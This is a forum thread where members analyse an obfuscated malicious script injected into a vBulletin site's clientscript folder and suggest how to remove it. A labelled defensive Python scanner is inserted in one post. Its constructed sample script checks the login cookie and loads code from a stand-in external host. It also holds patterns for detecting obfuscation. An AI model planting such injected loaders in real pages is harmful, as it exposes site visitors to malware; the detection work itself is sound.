
Thread: AVF is infected with Malware

  1. #11
    AVF Regular
    Join Date
    Mar 2013
    Location
    Adelaide
    Posts
    623
    Quote Originally Posted by Dogamondo View Post
    Javascript dev for the past 15 years here.
    Obfuscated JS is basically a process of making it very difficult to be human readable. It started out as a way to reduce the file size (called minification) and then as a way to protect intellectual property, and then by attackers as a way to inject malicious javascript into a website for phishing and malware without easily being decoded.
    I've had a look at the file on this site that was picked up by the Sucuri site. I ran it through a deobfuscator to try and figure out what it's doing.
    The file is very heavily obfuscated and injects a connection to an external website via a client-side request.
    From inspecting the web connections made after loading aussievapers.com, it appears the connection is to a site called go.pushnative.com, which is a high risk malware site according to McAfee:
    https://www.mcafee.com/threat-intell...pushnative.com
    I would say this script is definitely malware as it's disguised as an MD5 (encryption algorithm) script that sits with all the client side VBulletin script files (the forum software that this site runs).
    All the legit scripts are easily readable and have header information, whereas this script looks like it's been placed there deliberately by an attacker (probably a common exploit in the VBulletin software that allowed hackers to put the script there).
    This script isn’t run if you are logged in, it only appears in the client side scripts folder when first visiting the site.
    While typing this the browser on my test machine has crashed twice since visiting the forum home page.
    I'm not sure whether the popups are related to this as they seem to be advertising related. Maybe someone can confirm if Jato is monetising this site using the popup ads? If not then it's clear that AussieVapers has been hacked sometime in the last few months.
    The first thing Jato should do is to delete the clientscript/vbulletin_md5.js file as this seems to be the offending file, then update VBulletin and run a scan on the whole aussievapers.com.au domain to make sure there are no other malicious files on the server.
    Update: The popup issue and VBulletin vulnerability confirmed with potential fix here:
    Malicious Pop-ups in vBulletin - Sucuri Research - Website Monitoring, Recovery and Protection
    Wow, looks like you had a little fun writing that one up!
    Fatman, Dogamondo and DocM like this.
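    A defender-side check for the kind of file the post describes, added here as an example (not code from the thread, from Dogamondo, or from vBulletin): it walks a clientscript folder and flags header-less, obfuscated scripts that call out to hosts the site does not normally use. The trusted-host list, the thresholds and the two sample scripts are constructed assumptions.

```python
import os
import re

TRUSTED_HOSTS = {"aussievapers.com.au", "www.aussievapers.com.au"}  # assumption: the site's own hosts

# Heuristics drawn from the post: legitimate vBulletin scripts are readable and start with
# a header comment; the injected file was header-less, obfuscated, login-gated and called out.
DYNAMIC_EXEC = re.compile(r"\b(?:eval|unescape|Function)\s*\(|\.fromCharCode\s*\(")
HEX_ESCAPES = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def assess_js(src, trusted_hosts=TRUSTED_HOSTS):
    """Return the list of reasons a script looks suspicious (empty if clean)."""
    findings = []
    if not src.lstrip().startswith(("/*", "//")):
        findings.append("no header comment")
    longest = max((len(line) for line in src.splitlines()), default=0)
    if longest > 200:  # minified code also trips this, so it is one signal among several
        findings.append(f"very long line ({longest} chars)")
    if DYNAMIC_EXEC.search(src):
        findings.append("dynamic code execution (eval/unescape/fromCharCode)")
    if HEX_ESCAPES.search(src):
        findings.append("hex-escaped string literals")
    if "document.cookie" in src:
        findings.append("reads document.cookie (may gate on login state)")
    hosts = sorted({h for h in URL_HOST.findall(src) if h not in trusted_hosts})
    if hosts:
        findings.append("unexpected external host(s): " + ", ".join(hosts))
    return findings

def scan_clientscript(folder):
    """Scan every .js file under folder; return {path: findings} for flagged files."""
    flagged = {}
    for root, _dirs, files in os.walk(folder):
        for name in files:
            if name.endswith(".js"):
                path = os.path.join(root, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = assess_js(fh.read())
                if findings:
                    flagged[path] = findings
    return flagged

# Constructed samples (not the site's real files): a header-bearing legitimate script
# and a header-less obfuscated one of the kind the post describes.
LEGIT_JS = "/* vBulletin clientscript header (constructed sample) */\nfunction md5hex(s) { return s; }\n"
SUSPICIOUS_JS = ('var _0x1=["\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f"];'
                 'if(document.cookie.indexOf("userid")<0){eval(String.fromCharCode(118,97,114));'
                 'var s=document.createElement("script");s.src="https://popup-host.example/push.js";'
                 'document.head.appendChild(s);}')
```

    Run `scan_clientscript("/path/to/clientscript")` on a copy of the webroot; a clean vBulletin install should produce few or no flagged files, and anything flagged deserves a manual read before deletion.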

  2. #12
    Super Moderator
    Join Date
    Aug 2012
    Location
    Central Vic, up near the Murray
    Posts
    18,763
    Excellent detective work Dogamondo!!!
    I stand corrected
    ( see folks told you I was wrong lol )

    I have emailed your response to Jato for his info ... hopefully it gets sorted

    Cheers folks ... unfortunately us mods are not in the position to do anything about it so fingers crossed !
    EPM V2-18490 (X2 ),GP Spheroid V2.5 and GP Piccolo V2.5 ,BBCB, Provari mini's, REO mini V2.1, 18490 REO , Jazz Carto Pipes ( fitted with GA tank and churchwarden stem Totally Evil!!! ), Meerschaum pipe ,e-holly35W,Phideas, AIOS,Taifun atties, PC Pipe mods.PC Squonker, Svapiamo squonker, GP Paps Heron combo.

    Vaping since 2007 totally smoke free since 2011


    AVF Rules, read and understand them

  3. #13
    AVF Regular
    Join Date
    Feb 2017
    Location
    Sydney
    Posts
    799
    Hahahah... So happy a JS dude looked into this. And you are right this started happening a few months back. Remembered everyone hammering FM to hassle Jato to fix the issue. hahahahah

    Quote Originally Posted by Dogamondo View Post
    Javascript dev for the past 15 years here.

    Obfuscated JS is basically a process of making it very difficult to be human readable. It started out as a way to reduce the file size (called minification) and then as a way to protect intellectual property, and then by attackers as a way to inject malicious javascript into a website for phishing and malware without easily being decoded.

    I've had a look at the file on this site that was picked up by the Sucuri site. I ran it through a deobfuscator to try and figure out what it's doing.

    The file is very heavily obfuscated and injects a connection to an external website via a client-side request.

    From inspecting the web connections made after loading aussievapers.com, it appears the connection is to a site called go.pushnative.com, which is a high risk malware site according to McAfee:

    https://www.mcafee.com/threat-intell...pushnative.com

    I would say this script is definitely malware as it's disguised as an MD5 (encryption algorithm) script that sits with all the client side VBulletin script files (the forum software that this site runs).

    All the legit scripts are easily readable and have header information, whereas this script looks like it's been placed there deliberately by an attacker (probably a common exploit in the VBulletin software that allowed hackers to put the script there).

    This script isn't run if you are logged in, it only appears in the client side scripts folder when first visiting the site.

    While typing this the browser on my test machine has crashed twice since visiting the forum home page.

    I'm not sure whether the popups are related to this as they seem to be advertising related. Maybe someone can confirm if Jato is monetising this site using the popup ads? If not then it's clear that AussieVapers has been hacked sometime in the last few months.

    The first thing Jato should do is to delete the clientscript/vbulletin_md5.js file as this seems to be the offending file, then update VBulletin and run a scan on the whole aussievapers.com.au domain to make sure there are no other malicious files on the server.

    Update: The popup issue and VBulletin vulnerability confirmed with potential fix here:

    Malicious Pop-ups in vBulletin - Sucuri Research - Website Monitoring, Recovery and Protection
    Dogamondo likes this.

